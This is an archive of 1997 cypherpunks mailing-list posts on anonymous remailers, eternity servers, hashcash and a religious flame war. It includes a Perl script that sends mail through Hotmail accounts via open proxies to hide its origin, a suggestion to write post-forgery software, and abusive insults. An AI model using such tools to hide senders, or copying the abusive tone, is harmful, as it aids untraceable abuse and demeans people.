`Universal Internet Piracy Service'. I think his ideas were to explore the financial aspects of trading system for illicit software. He wasn't planning to put up a distributed document store, but to have an distribution medium were there was a continuous flow of information. As long as the information could still get through in the face of hostilities from copyright police, it was doing it's job and the software could be traded. I don't think he's released software yet, and I don't think there's any papers available on the net, but it was still an active idea last I heard. > then adding an encryptor and decryptor isn't going to change it, > otherwise simply post the encrypted text, and the passphrase in the > same message, or the encrypted text, the secret key, etc. Except > that the URL interface makes access more convienient. Yup. Actually it'll be much more convenient because it will disappear out of the news spool presently, and the eternity servers might get to the stage where they keep a virtual raid file server implemented by exchanging documents from their caches, and can archive the most popular stuff. So because it's more convenient it's even less defensible as it's providing some part of this service. See the post about building a distributed dejanews replacement for another approach to this problem which is probably more defensible. Might turn out to be a better way if your suspicions prove correct. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <5sg43l$v7v$1@abraham.cs.berkeley.edu> In article <199708080936.KAA01816 at server.test.net>, Adam Back wrote: > >Mike Duvos writes: >> Someone wrote: > >(That someone was me). > >> > What about AOL disks? We need shorter lived, disposable >> > remailers as exit remailers... Let them take the heat, >> > while the real remailers walk. Lets see a series of >> > "exitman" remailers. Exitman remailers are walking targets >> > left to fend for themselves as long as they may. >> >> By reconfiguring current remailers to use a public Email service >> as the last link in the chain, we tap a potentially infinite >> supply of disposable accounts, on advertising-supported service >> providers with skins as thick as those of the bulk emailers. >> >> Sounds like a plan to me. > >OK, lets _do_ it! Sounds good to me. Hotmail makes a note of the IP address that connected to it, but luckily there's no shortage of HTTP proxies out there... - Ian #!/usr/bin/perl -w ## ## sendhotmail: pipe an RFC822 mail message into this, and it will send it ## out from a hotmail account via an HTTP proxy ## ## Initial revision 19970808 by Ian Goldberg ## ## Set the following to your proxy host and port. ## Look at the files pointed at by ## http://ircache.nlanr.net/Cache/Tracker/caches/ ## for sample entries, but most of them don't allow just anyone to connect ## to hotmail through them. $proxyhost = 'proxy.slt.lk'; $proxyport = 8080; ## This is your hotmail login name and password $login = ## Fill this in yourself $passwd = ## Fill this in yourself ## End Configuration sub escapetext { my $t = $_[0]; $t =~ s/([\000-\037\200-\377\{\}\|\\\^\[\]\`\"\<\>\:\@\/\;\?\=\&\%\.\#])/"%".unpack('H2',$1)/eg; $t =~ s/ /+/g; $t; } ## Parse the incoming mail (note that we don't handle continuation headers) ## Also, the To, Cc, and Bcc headers ought to be in a form hotmail understands ## (no full names, etc.). We try to do the stripping properly. $to = ''; $subject = ''; $cc = ''; $bcc = ''; while() { if (/^To:\s+(.*)/io) { $to = $1; $to =~ s/\(.*?\)//g; $to =~ s/\".*?\"//g; $to = &escapetext($to); } elsif (/^Subject:\s+(.*)/io) { $subject = &escapetext($1); } elsif (/^Cc:\s+(.*)/io) { $cc = $1; $cc =~ s/\(.*?\)//g; $cc =~ s/\".*?\"//g; $cc = &escapetext($cc); } elsif (/^Bcc:\s+(.*)/io) { $bcc = $1; $bcc =~ s/\(.*?\)//g; $bcc =~ s/\".*?\"//g; $bcc = &escapetext($bcc); } last if /^$/; } $msg = &escapetext(join("\r\n", )); use LWP; ## Begin magic $ua = new LWP::UserAgent; $ua->proxy('http', "http://${proxyhost}:${proxyport}/"); $url = new URI::URL 'http://www.hotmail.com/cgi-bin/password.cgi'; $request = new HTTP::Request('POST', $url); $request->header(Pragma => 'no-cache'); $request->content("login=${login}&curmbox=ACTIVE"); $response = $ua->request($request); $body = $response->content; $body =~ /\<\s*form\s+[^>]*action=\"(.*?)\"/io or die "Cannot log in"; $url = new URI::URL $1, $url; $body = $'; $body =~ s/\<\s*\/form\s*\>.*//; $body =~ /\<\s*input\s+[^>]*name=\"disk\"\s+value(=\"(.*?)\")?/io or die "Cannot give passwd"; $disk = $2 || ""; $request = new HTTP::Request('POST', $url); $request->header(Pragma => 'no-cache'); $request->content("passwd=${passwd}&frames=no&disk=${disk}&curmbox=ACTIVE&login=${login}&js=no"); $response = $ua->request($request); $body = $response->content; $body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/compose.*?)\"/io or die "Cannot compose"; $composeurl = new URI::URL $1, $url; $body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/logout.*?)\"/io or die "Cannot compose"; $logouturl = new URI::URL $1, $url; $request = new HTTP::Request('GET', $composeurl); $request->header(Pragma => 'no-cache'); $response = $ua->request($request); $body = $response->content; $body =~ /\<\s*form\s+[^>]*action=\"(.*?)\".*?\>/io or die "Cannot send message"; $url = new URI::URL $1, $composeurl; $body = $'; $data = ''; while(1) { $body =~ /^\s*\<\s*input\s+type=\"?hidden\"?\s+name=\"(.*?)\"\s+value(=\"(.*?)\")?\s*\>/io or last; $name = $1; $value = $3 || ""; $body = $'; $data .= $name."=".$value."&"; } $data .= "to=${to}&subject=${subject}&cc=${cc}&bcc=${bcc}&body=${msg}&Send.x=1&Send.y=1"; $request = new HTTP::Request('POST', $url); $request->header(Pragma => 'no-cache'); $request->content($data); $response = $ua->request($request); $body = $response->content; $request = new HTTP::Request('GET', $logouturl); $request->header(Pragma => 'no-cache'); $response = $ua->request($request); From trei at process.com Fri Aug 8 15:11:55 1997 From: trei at process.com (Peter Trei) Date: Sat, 9 Aug 1997 06:11:55 +0800 Subject: Did anyone archive MPJ's site? Message-ID: <199708082010.NAA16573@cygnus.com> Did anyone manage to copy all of Mike Johnson's North American Crypto archive before he pulled the plug? Peter Trei trei at process.com Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From paulmerrill at acm.org Fri Aug 8 15:13:49 1997 From: paulmerrill at acm.org (Paul H. Merrill) Date: Sat, 9 Aug 1997 06:13:49 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca> Message-ID: <33EBBB66.2C60@acm.org> David D.W. Downey wrote: > > You know, you are just about the biggest idiot I have ever had the > displeasure of reading. For one, the largest religion in the US right > now *is* in fact judeo-christian. The largest is Roman Catholic with > Pentacostal Protestant following right behind. judeo-christian isn't a religion. Christian is. > Next, this country was > founded on christian beliefs, or have you failed to read the words of > the constitution of the US. Considering the apparent ignorance you have > displayed thus far about the makeup of the US, I would venture to say > that you probably have not read it. I have read the Constitution and the history behind it. The US was founded by people trying to escape religious persecution and/or trying to get rich. In case you can't figure it out, forcing your views down my throat IS religious persecution -- exactly the same sort that sent the Pilgrims off on the Mayflower. > Next, you attack christians for > trying to control the content made available on the internet. At least > the site ratings plan is better than alot of other plans I have seen. > Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt > the spread of trash that *most* humans would want out of of the reach of > their children? I have not seen you *once* offer a straightforward clear > cut plan to efficiently handle *any* issue placed for discussion on this > listserv. I have seen you do nothing but slam, belittle, and degrade > others and their beliefs and ideas. That statement is somewhat similar to saying that if you don't like your chains you are free to suggest the stocks or perhaps rope. > You do this under the unimpressive > tag of "TruthMonger". If anything, you are anything but a TruthMonger. > When you can come up with a plan that even *remotely* seems like a > logically thought out, planned, and intelligent proposal on how to > handle the issues presented everyday on the internet that affect the > computing industry balanced with a concern for the children, then I will > listen. As long as the scum that gravitates toward LEAs and the Government continue to do so it is relatively stupid to express (or defend) views outside the accepted norm in an open fashion. (I guess that makes me sorta stupid, huh?) > (And yes, I do agree that the parents of the children have an > obligation to monitor the content they are exposed to. It's called > responsible parenting which unfortunately is not a well practiced > ideology. And to take the wind out of your sales, I have 2 children and > as a parent I limit them to what is appropriate to their ages.) I have two of my own and I don't see how "protecting" them in the ways that you seem to like would do anything other than warp their worldview to such a level that they will be esay prey for whatever scum they run into in the meatworld. > Until > such time as you can fulfill the obligations to us, the adult computing > population, and our offspring, the children (just in case your fuddled > mind does not know what they are), I suggest you rest those busy little > fingers of yours and listen to the underlying theme of the issues before > us. I don't know about TruthMonger but I did listen to the underlying theme of the issues before us and I found that it was actually scum-suckers and other bottom feeders trying their damnedest to steal my freedom. That's why I'm typing here and now. > Until then, HateMonger, I have one suggestion for you..... Shut Up! The hatemonger that I see in this interchange is not TruthMonger and it's not me -- Let's see, I guess that leaves . . . Not the TruthMonger, Paul H. Merrill From aba at dcs.ex.ac.uk Fri Aug 8 15:16:40 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 9 Aug 1997 06:16:40 +0800 Subject: some hashcash advocacy (was Re: anti-spam law implies laws against remailers?) In-Reply-To: <97Aug8.131019edt.32257@brickwall.ceddec.com> Message-ID: <199708082145.WAA01973@server.test.net> nospam-seesignature at ceddec.com writes: > On Fri, 8 Aug 1997, Adam Back wrote: > > > [hashcash] > > I think you never answered the fundamental question: > > But to what advantage is it for *ME* to use hashcash? > > Saying that it is neat, patriotic, pious, or any other adjective won't get > my anonymous mail through any faster unless you can create a cartel of > remailers that expidite hashcashed mail, or use some type of new remailer > that others don't have and build hashcash into the distribution. I wasn't talking about remailers above, but about end users. Hashcash allows the recipient to filter out email that hasn't got postage. As an interim upgrade path ISPs adopting it could be to bounce messages with out payments, and include a nonce, and instructions to resend including the nonce. Set up the filter so that the second post gets through. Spammers often don't have forged reply addresses for obvious reasons. (If spam crept up too badly in-spite of this you could at that point disable non-hash cash postage and give a URL for a java implementation where they just go to the web page and their browser will generate them some hash cash. Obviously this is inconvenient so I would be interested to see how the spammers adapted to just the nonce first. It's much easier to block spammers if they have to include replyable email addresses.) You would also have a no-postage list, for mailing lists etc. If we arrange so that spam won't get through without payment, it disincentivizes spammers. If some users go running around asking for `government to do something about spam', it could be suggested to them that it would be more effective to ask their ISP to install a hashcash patched sendmail. A remailer won't answer the bounce with nonce, so you automatically won't get remailer traffic without postage -- unless you put remailers on your no-postage list. If you're some media celebrity and you get too much email -- just turn up the squech, increase the postage required rate, and add people you do want to your no-postage list. You could auto-add anyone you ever manually replied to to the no-postage list even. > You still have the problem that a large organization can buy large > computers just to do hashcash - look for networkable hashcash generators > if it becomes popular. I think the easiest initial way for the spammer to continue spamming you would be to target mailing lists, using forged addresses. Spam on mailing lists instead of mail is also a good thing for us, because we already have solutions for spam on mailing lists: decentralised 3rd party ratings -- NoCeMs can be applied to mailing lists. Allowing us to recommend good posts or mark what we consider spam. Individual users can decide which rating service to use. If you consider that hashcash can be setup to only charge postage for people you have never replied to in the past, this heavily discriminates against people who send large amounts of mail to random people. (Which is precisely the spammers mailing pattern!) Another solution with real ecash is to send ecash payment with mail and have filters that will similarly bounce messages if there is no ecash. The recipient by societal convention is expected not to cash the payment. People who cash your money you don't tend to send more email to. You could easily charge $1 and that would be a high price for the spammer -- it would be cheaper to snail mail you the spam. The above doesn't seem very friendly, or very in keeping with the spirit of free discourse. I think hashcash is nicer in this respect. I've taken the stuff on eternity to another message. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708081827.TAA01595@server.test.net> Dimitri Vulis writes: > jbaber at mi.leeds.ac.uk writes: > > > Any comments/glareing weaknesses that I have missed? > > I used to think this scheme is very cool. Later I realized it had a > serious problem with forgeries in one's name. > > Suppose X forges an article in Y's name, and specifies a cancel > lock; then Y can't cancel this forgery. But that's cool! Y shouldn't be able to cancel the forgery ... he didn't write it. That's the definition of censorship, removing some one else's content. I mean this seriously. People should stop misplacing any value on >From fields. You need to use digital signatures to recognize persistent personas. The quicker people realise this the better. It is in cypherpunks interests to see as many forgeries as possible. Because then the natural solution is for people to use digital signatures. More people using crypto, the harder it is to outlaw. (Dimitri: perhaps you need to code some easy to use high quality forgery software to go with your cancel bot). > The retraction server which David is reported to be working on > doesn't rely on passwords on authenticate Y; if Y can demonstrate > the ability to receive a cookie sent to Y, then the server can issue > a signed 'hide' NoCeM for an article that purports to be from Y. > Works for forgeries too. (David = David Formosa?) What's the point of this? To provide a way to stop unsophisticated forgeries without needing NoCeM support in the client? I guess it would work well enough, but it's really a bit centralised. The operator of the retraction server might be over trusted by a lot of people. If the operator turns out to be untrustworthy, or whatever, you're out of luck. Also break into his machine and steal his secret key and you could have a _lot_ of fun. And it's only one machine, what if his security isn't up to much. Think decentralised. That's the whole advantage NoCeM, it's decentralised approach to providing a third party USENET news article rating system. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <33EBBCBE.5F95@acm.org> I think you better check the IDs a little better next time. That interview was with someone from the religious hierarchy (or someplace significantly lower) ((it is so hard to tell them apart these days)) not Jesus. Time is just about ripe to drive the moneychangers from the temple again. After all, you wouldn't like it if DDWD were to put out hisparty line spoutings under TruthMonger would you? In much the same way, I am sure that Jesus does not care for the atrocities that have been and will be done in his. Paul H. Merrill From ariel at watsun.cc.columbia.edu Fri Aug 8 16:06:09 1997 From: ariel at watsun.cc.columbia.edu (Ariel Glenn) Date: Sat, 9 Aug 1997 07:06:09 +0800 Subject: Did anyone archive MPJ's site? Message-ID: I got parts of it but am missing much of the PGP and almost all of PGP tools :-( I am hoping someone else got those parts. Otherwise I can get some of it from MIT, I suppose... Ariel Glenn / AcIS R&D / Columbia University ariel at columbia.edu std.. blah.... From enoch at zipcon.net Fri Aug 8 16:13:47 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sat, 9 Aug 1997 07:13:47 +0800 Subject: Distributed Dejanews Message-ID: <19970808230710.13219.qmail@zipcon.net> Adam Back writes: > Recap on old idea of using dejanews and altavista > However is another important reason not to use altavista or > dejanews: it's not decentralised. If something > sufficiently hot gets published they'll both be taken off > line long enough to figure out how to disable access to > eternity. Even if they can't do it ultimately because of > sufficiently advanced public key text steganography, it'll > disrupt the service. If we aren't going to actually shell out money for a worldwide network of Eternity file servers, we have to use existing publicly available services as our distributed data haven. The more places we can stash things, the merrier. Currently, we post documents to Usenet, and keep them alive by reposting prior to the server expiring them. This is robust, not easily censored, and little effort. I see nothing wrong with having the server also examine Dejanews for Eternity documents, lightly stegoed to avoid the deletion of encoded data. To the extent that Dejanews serves as a more permanent repository of data than Usenet, fine. The worst thing that can happen is that documents get removed, in which case, the guardian of the document in question returns to keeping it alive on Usenet. All this is transparent to people using Eternity to read documents. Dejanews likely removes encoded data because of storage requirements, not because of content. Unless the Eternity business becomes a significant fraction of Usenet bandwidth, stego wars with Dejanews are unlikely. > A distributed deja-news replacement > So what are the storage requirements? What does dejanews > have in their machine room? (Huge raid server? How many > Gigs?). Dejanews started in 1995. By 1996, they had 80 million articles in 15,000 Usenet newsgroups. They currently have 109 million articles. The Dejanews database is presently 180 gigabytes. They index all the "most active" Usenet newsgroups, minus binaries and some other controversial content. A week of a full Usenet feed is presently just a tad over 20 gigabytes, and is growing by leaps and bounds. > I'm wondering if 1000 academic nodes, small and large ISP > nodes, and indivduals each contributing 1Gb each could out > perform deja-news. That's more storage than Dejanews currently has. Performance is another issue. > That'd be 1Tb. How long would 1Tb last at the being > consumed at a rate of a full USENET feed? Less than one year, if you kept everything. > On top of distributed news archive, build an eternity > service > So with the eternal news archive, you now have everything > you need to easily build an eternity server. > How practical is this? Not very. You are tossing out one of the most useful aspects of Usenet news as a Distributed File System, namely acting as a "Giant FIFO" of what is interesting during any particular window of time. > How much interest is there likely to be in creating a full > USENET archive as a distributed net based effort. None at all. Keeping everything that had ever been posted to Usenet forever would be a giant waste of resources. What I suspect you need here is the "Distributed File System" of the future, which could carry Usenet as well as support Web, NFS, FTP, and all other popular protocols to access its content. It would be a giant FIFO with hundreds of gigabytes of capacity, with reliable transport, authentication, encryption, and a micropayment system for accessing and prolonging the lifetime of data stored on it. It would of course be uncensorable, as Usenet is today, and the Eternity Service could run on top of it, as well as a lot of other interesting things. > It's clearly got vastly larger storage requirments than > storing the full set of eternity articles posted to USENET. > However it has wider uses, and has lots of innocuous reasons > to exist. I guess it's quite an interesting project in it's > own right. You could start with just some newsgroups, and > build up as a way to boot strap it. But it may be harder to > generate enough interest to deploy this than to deploy > enough eternity servers to do build a distributed archive > of just eternity articles. It's certainly interesting to think of what the ultimate DFS for the Internet might look like, given the various white papers on NC, thin clients, fat servers, and big pipes. But this isn't something that is going to happen overnight. To the extent that we employ Usenet in interesting new ways as a DFS today, we create working models of many of these concepts and demonstrate their feasibility. > How soon could it happen? > Who knows. What do people reckon the interest would be in a > distributed complete USENET archive for it's own sake. For > purposes of the archive cancels would not be applied. > Indeed archive the cancels too, and the control messages for > everyone to see for perpetuity who did and said what. Well, the disk manufacturers would probably love it, and want it replicated every ten feet across the planet. I don't know about other people. > Perhaps it will be more realistic to build a distributed > archive for eternity documents only first. If it is > designed as a separate service, then it could be the same > software to do either, just restrict it to > alt.anonymous.messages, or just for alt.anonymous.messages > passing a filter program. > Comments? First of all, instead of thinking of this in terms of being the singing and dancing Usenet archive of all time, we would do much better if we thought of it as a protocol-independent Network-wide Distributed File System with configurable characteristics suited to a wide variety of applications. If we could put together a prototype with a small number of nodes, and demonstrate it could carry both Usenet and Eternity as well as provide NFS3 access to commonly requested Network binaries, all supported by an integrated micropayment scheme, that would go a long way towards making it a standard. Would anyone care to donate some storage, cycles, and a fast pipe to the Net? -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From nobody at REPLAY.COM Fri Aug 8 16:44:19 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Aug 1997 07:44:19 +0800 Subject: The BIG Lie (Jesus Confesses) Message-ID: <199708082309.BAA22877@basement.replay.com> At 06:26 PM 8/8/97 -0400, you wrote: >You know, you are just about the biggest idiot I have ever had the >displeasure of reading. For one, the largest religion in the US right >now *is* in fact judeo-christian. Showing many people suffer from delusion. >The largest is Roman Catholic with >Pentacostal Protestant following right behind. Next, this country was >founded on christian beliefs, or have you failed to read the words of >the constitution of the US. Ah, yes, but the constitution also has a thing on seperation of church and state, or did you fail to read the words? >Considering the apparent ignorance you have >displayed thus far about the makeup of the US, I would venture to say >that you probably have not read it. Next, you attack christians for >trying to control the content made available on the internet. The Christian Coalition (The Happy Nazi's), is one major group trying to censor information, becuase they and their mythical god think that it's right. Forcing your beliefs on others in fascism, and never was right. >At least >the site ratings plan is better than alot of other plans I have seen. >Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt >the spread of trash that *most* humans would want out of of the reach of >their children? Monitor the kids web access, or do your job and be a parent. >I have not seen you *once* offer a straightforward clear >cut plan to efficiently handle *any* issue placed for discussion on this >listserv. I have seen you do nothing but slam, belittle, and degrade >others and their beliefs and ideas. I've only seend TM degrade Anti-Crypto persons, fascists, Censorous Christians, and other like those groups who fight to usurp our constitution. >You do this under the unimpressive >tag of "TruthMonger". If anything, you are anything but a TruthMonger. I find his posts suprisingly true, if anything else. >When you can come up with a plan that even *remotely* seems like a >logically thought out, planned, and intelligent proposal on how to >handle the issues presented everyday on the internet that affect the >computing industry balanced with a concern for the children, then I will >listen. (And yes, I do agree that the parents of the children have an >obligation to monitor the content they are exposed to. It's called >responsible parenting which unfortunately is not a well practiced >ideology. Therefore, if you bitch about your kid going to www.porn.com while you where out eating with friends, then that person would be a neglectful parent. >And to take the wind out of your sales, I have 2 children and >as a parent I limit them to what is appropriate to their ages.) What does that encompass? Do you supress web pages advocating safe sex because it may corrupt their minds? Tell me, SuperDad (R), how do you manage to raise your kids perfectly? >Until >such time as you can fulfill the obligations to us, TruthMonger isn't obligated to do anything, and he owes you nothing, dumbass. >the adult computing >population, and our offspring, the children (just in case your fuddled >mind does not know what they are), I suggest you rest those busy little >fingers of yours and listen to the underlying theme of the issues before >us. Until then, HateMonger, I have one suggestion for you..... Shut Up! Oh, so we're a censorous Nazi Ratfucker, are we? Let me tell you something, Downey, don't tell other what to do, TM has every right to post as you do. So if you don't like his posts, you aren't obligated to read them in the first place. If it offends you, don't look at it in the first place. Such a simple thing for such a powerful mind like yours to look over. As for your forcing morals down our throats all I can say is "Your God is DEAD, and no one cares!!! If there is a hell, I'll see you there!!!" - Nine Inch Nails "Heresy" From alan at ctrl-alt-del.com Fri Aug 8 16:51:31 1997 From: alan at ctrl-alt-del.com (Alan) Date: Sat, 9 Aug 1997 07:51:31 +0800 Subject: Did anyone archive MPJ's site? In-Reply-To: Message-ID: On Fri, 8 Aug 1997, Ariel Glenn wrote: > I got parts of it but am missing much of the PGP and almost all of PGP > tools :-( > > I am hoping someone else got those parts. Otherwise I can get some of > it from MIT, I suppose... I offered to mirror it. The site is set up for uploads. I hope it is not too late. (I did not realize it was going to vaporize that quick.) If he has backups and/or can get the files loaded on my system, the offer to host the archive still stands. (Also, if someone else has the files, it can be put up on the server. I cleared 350 megs for it...) alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From jf_avon at citenet.net Fri Aug 8 16:53:28 1997 From: jf_avon at citenet.net (jf_avon at citenet.net) Date: Sat, 9 Aug 1997 07:53:28 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <33EB9D22.166F80B5@cyberspacetechnologies.com> Message-ID: <199708082324.TAA26057@cti06.citenet.net> On 8 Aug 97 at 18:26, David D.W. Downey wrote: > Next, this country was founded on christian beliefs, or have you > failed to read the words of the constitution of the US. Comments from Canada: Libertarians usually attibutes the reference to the christian cult in the US constitution as some sort of psycho-epistemological failure or ill-weighed concession to the peoples beliefs of the time. IMO, it is a major flaw that led to the actual state of affairs. Causes have effects. A is A and you cannot run away from the Nature of things. > Considering the apparent ignorance you have > displayed thus far about the makeup of the US, I would venture to say > that you probably have not read it. Next, you attack christians for > trying to control the content made available on the internet. Factually, they are one hell of a big pressure group trying to ram their personnal convictions down the throat of others, with a legalized gun to back them up. I don't ask that you love eating Cheez-Whiz with corn syrup and peanut butter with a dash of Tabasco sauce so don't ask me to start eating your stuff. > At least > the site ratings plan is better than alot of other plans I have seen. I would be surprized. Ultimately, in their deep nature, they are all as evil. A is A. You will not, in the long run, be able to avoid the effects of their nature. > I have seen you do nothing but slam, belittle, and degrade > others and their beliefs and ideas. The degradation perceived by whom? He might be slightly harsher than others, but you discount the good laughs that it also gives to some others. Actually, you should rejoice at 'Monger's opinions; doesn't your code of moral preach spreading the well of others at the expense of your own? If not, then, tsk tsk tsk... > You do this under the unimpressive > tag of "TruthMonger". If anything, you are anything but a TruthMonger. > When you can come up with a plan that even *remotely* seems like a > logically thought out, planned, and intelligent proposal on how to Sorry, but you disqualify for such thing. The psycho-epistemology of religions makes it impossible. Your axiomatic belief of God invalidates all logics. Therefore, each time you request a "logically thought out" explanation, you commit the act of concept stealing, i.e. you use the end result of a philosophy to try to invalidate it. But you know, what you saw in cartoons, the vacuum cleaner sucking itself into nothing or the snake eating it's tail and disappearing, it just doesn't exist... Reality (with a capital R) doesn't work that way. Sorry. > handle the issues presented everyday on the internet that affect the > computing industry balanced with a concern for the children, then I will > listen. You mean, "to get a ride on the gravy train, enforced under the treath of violence at the point of the governmental gun" ? > (And yes, I do agree that the parents of the children have an > obligation to monitor the content they are exposed to. Again, instead of using "moral duty", you use the word, "obligation". Coercion galore! > It's called ... according to some standards... > responsible parenting Here, I tend to agree on your sentence but I have a hunch that our basic justifications are quite far... Morality, according to cultists, is to be defined by the worshipped entity. To free-living rationnal individuals, it should be defined according to the most accurately understood Nature of Man. Most observer of the later would agree that parental supervision is necessary. But also, most of thoses parents would agree that Freedom is required for man to live as Man, i.e. as a rationnal animal. [This paragraph left intentionally unfinished] > which unfortunately is not a well practiced > ideology. Why "unfortunately" ? because it doesn't not suit your teleological slave mentality or because you truly care about other young Human Animals? Personnally, it is because of the later reason. > And to take the wind out of your sales, I have 2 children and the relevancy of this disclosure baffles me. > Until > such time as you can fulfill the obligations to us Who proclaimed such obligation? The whole attempt at censorship is an attempt to make peoples accept this "obligation". There is no way to bring a slave out of slavery when they willingly forge their own chains... > population, and our offspring, the children (just in case your fuddled > mind does not know what they are) Here is a long term solution that would solve the problem definitely: to promulgate that everybody being offensed by the content of the net gets neutered. That way, they won't have to worry about their children's viewing habits... The acceptability of this solution passes all the tests that the one you propose does. If you have any arguments that does not have at it.s base, the negation of Reason, i.e. non-contradictory identification, then, give it your best shot. jfa -- Jean-Francois Avon, Pierrefonds(Montreal) QC Canada JFA Technologies, R&D physicists & engineers Instrumentation & control, LabView programming. PGP keys: http://w3.citenet.net/users/jf_avon and: http://bs.mit.edu:8001/pks-toplev.html PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C From kent at songbird.com Fri Aug 8 17:05:26 1997 From: kent at songbird.com (Kent Crispin) Date: Sat, 9 Aug 1997 08:05:26 +0800 Subject: some hashcash advocacy In-Reply-To: <97Aug8.131019edt.32257@brickwall.ceddec.com> Message-ID: <19970808165350.55775@bywater.songbird.com> On Fri, Aug 08, 1997 at 10:45:29PM +0100, Adam Back wrote: [...] > I wasn't talking about remailers above, but about end users. Hashcash > allows the recipient to filter out email that hasn't got postage. Ie, hashcash is a fancy techie oriented self-labelling technique. :-) I didn't read the code, but it seems that the double spending protection is just local to the recipient (ie, there isn't a trusted central clearinghouse that checks against double spending on a global basis). Thus, a spammer could calculate postage for a message, then send 100000 copies. Hashcash would guarantee that each user only got one copy, but there are easier ways to do that. [If the checking was done at an ISP level, of course, only one message would get through. But that requires widespread deployment at the ISP level, not the individual user level, and checking at the ISP level requires that the ISP keep a database of users mail preferences.] But without a central clearinghouse hashcash seems useless to me as a means of combating spam. And of course, a central clearinghouse brings up a whole raft of other issues concerning trust and so on... [...] > You could auto-add anyone you ever manually replied to to the > no-postage list even. I would rather pursue a "tit-for-tat" strategy for email, but unfortunately tit-for-tat requires stable identities... -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From tm at dev.null Fri Aug 8 17:13:15 1997 From: tm at dev.null (TruthMailer) Date: Sat, 9 Aug 1997 08:13:15 +0800 Subject: Christian CypherPunks / Re: The BIG Lie (Jesus Confesses) Message-ID: <199708082338.RAA17953@wombat.sk.sympatico.ca> David D.W. Downey preached hate and intolerance by saying: > Considering the apparent ignorance you have > displayed thus far about... I have not yet _begun_ to display my true ignorance. > ...the makeup of the US, I would venture to say > that you probably have not read it. Silly me. I thought it guaranteed freedom _from_ religion. That's the last time I ask "? the Platypus" to read something and give me a summary of it.. > Next, you attack christians for > trying to control the content made available on the internet. Thanks for at least being honest enough to admit it. I don't attack Christians for speaking their mind, I attack them for lying through their fucking teeth about their motives and intentions. I have no problem with Christians wanting to take firm control of their environment, but I object to them wanting to take control of _my_ environment. You might think there is a need for more Christian CypherPunks, while I think that there is a need for more CypherPunk Christians. (And Mike Duvos thinks there is a need for more lions.) If you take the time to read "The _Really_ Big Lie," which has all of the original post, instead of the one that the God/Dog of mirrored remailers was so rude as to edit with a lightning bolt, it might be slightly more clear that my rabid vendetta is not against a particular point of view, but against hypocrisy and oppression. > At least > the site ratings plan is better than alot of other plans I have seen. Yes, it is. And it still sucks, as do the available Search Engines. When was the last time you bought a Bible that had an index which showed 5,000 references to "he lifted her skirt, and knew her," for every reference it has to "I AM." What we have in common is that you don't want to have Little Johnny do a search for "Jesus" and get 5,000 sites with pictures of Jesus shoving a crowbar up his ass, and I don't want to try to find a site to buy a crowbar to work on my house and get 5,000 sites with pictures of Jesus shoving a crowbar up his ass. My point is that I don't object to you supporting InterNet tools which allow you to screen out pictures of Jesus with a crowbar up his ass, but I object to a "quick and easy" solution which blocks out all sites with a reference to "crowbars," because one guy in Toledo "used to have" a site with a single picture of Jesus with a crowbar up his ass. I would genuinely like to see more CypherPunk Christians. I would like to see them write code which you can use to "block" access to certain sites, and which I can use to "gain" access to certain sites. > Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt > the spread of trash that *most* humans would want out of of the reach of > their children? Burn all the Bibles. (Thought you had me on that one, didn't you?) > I have not seen you *once* offer a straightforward clear > cut plan to efficiently handle *any* issue placed for discussion on this > listserv. Tim May has already suggested that we, "Nuke D.C.", so any valid solution to society's problems would merely be a plagarism of Tim's stance. I just try to fill in the whitespace between Tim's posts. > I have seen you do nothing but slam, belittle, and degrade > others and their beliefs and ideas. I don't subscribe them to the CypherPunks list, I just turn on the gas... > When you can come up with a plan that even *remotely* seems like a > logically thought out, planned, and intelligent proposal on how to > handle the issues presented everyday on the internet that affect the > computing industry balanced with a concern for the children, then I will > listen. If you would listen to the *intelligent* proposals of rational, sober people who are capable of sustaining a logical train of thought (such as Declan McCullagh, Tim May, Blanc, and snow--to name but a few), and reply to them, then I would not have to suffer the indignity of foregoing taking my medicine in order to let my Tourette Syndrome and Obsessive Compulsive Disorder get so far out of hand that people such as yourself will feel threatened enough to shake themself out of their robotic slumber and contribute their knowledge, viewpoints and wisdom to the CypherPunks list. Listen up, shit for brains, I am about to follow this insult with a compliment... I enjoyed your post! It is refreshing to hear someone defend their faith using their own logic, intellect and thought, without merely resorting to meaningless platitudes such as "God is Love" or "Patience comes to those who wait." I don't have a "problem" with Christians, and I don't have a "problem" with anarchists. I have a problem with people who begin a sentence with the words, "EVERYBODY KNOWS..." Well, Lou Reed doesn't "know," although he wrote a great song making fun of those who _claim_ to "know." {If anybody on the list has his album, please post the relevant quotes.} > (And yes, I do agree that the parents of the children have an > obligation to monitor the content they are exposed to. It's called > responsible parenting which 